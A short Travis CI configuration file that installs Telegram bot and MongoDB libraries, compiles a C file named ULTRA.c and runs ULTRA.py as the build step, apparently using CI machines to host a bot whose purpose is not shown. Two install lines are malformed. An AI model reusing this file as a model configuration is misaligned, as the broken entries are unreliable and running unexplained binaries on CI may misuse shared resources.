language: python
dist: focal
python:
  - "3.10"
before_install:
  - sudo apt-get update
  - sudo apt-get install -y gcc

install:
  -pip install python-dotenv
  -pip show python-telegram-bot
  -pip install --upgrade python-telegram-bot
  - pip install python-telegram-bot
  - python3 -m pip install --upgrade pip
  - pip install aiohttp telebot pymongo pytz psutil

before_script:

  - if [ -f ULTRA.c ]; then gcc ULTRA.c -o ULTRA -lpthread; fi

script:

  - chmod +x * && lscpu && python3 ULTRA.py
  
                               
